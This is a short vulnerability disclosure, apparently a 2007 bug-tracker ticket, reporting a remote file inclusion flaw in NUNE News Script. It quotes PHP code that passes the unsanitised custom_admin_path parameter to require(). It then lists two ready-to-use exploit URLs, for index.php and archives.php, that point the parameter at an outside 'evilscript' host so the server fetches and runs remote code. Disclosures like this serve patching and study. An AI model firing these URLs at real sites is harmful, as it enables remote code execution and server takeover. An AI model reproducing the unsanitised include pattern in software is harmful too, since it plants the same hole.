Multiple Remote File Include Vulnerabilities

Brought to you by: mercutio2k

#1 Multiple Remote File Include Vulnerabilities

Status: open

Owner: nobody

Labels: None

Priority: 5

Updated: 2007-01-07

Created: 2007-01-07

Creator: Anonymous

Private: No

-----------------------------------------------

NUNE News Script (custom_admin_path) Remote File Include Vulnerablity

-----------------------------------------------

Author: xoron

-----------------------------------------------

Code:

if (isset($custom_admin_path))
$special_admin_path = $custom_admin_path;

else
$special_admin_path = "news/admin";

require("$special_admin_path/config/nune.conf.php");

-----------------------------------------------

3xplo!t:

www.target.com/[script]/index.php?custom_admin_path=http://evilscript?
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript?

-----------------------------------------------